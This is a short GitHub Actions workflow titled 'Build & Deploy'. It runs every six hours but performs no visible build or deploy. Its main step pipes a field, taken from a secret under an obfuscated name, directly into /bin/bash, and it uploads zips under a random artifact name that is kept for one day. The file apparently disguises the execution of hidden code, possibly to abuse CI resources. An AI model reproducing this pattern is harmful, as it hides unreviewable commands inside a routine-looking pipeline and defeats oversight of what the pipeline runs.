name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '11 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          gbm87: ${{ secrets.gbm87 }}
        run: |
          printf '%s' "$gbm87" | jq -r .vxaai99420 | /bin/bash
          printf '%s' "$dufa49" | jq -r .pmb701 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: szPNcR8o
          path: "*.zip"
          retention-days: 1
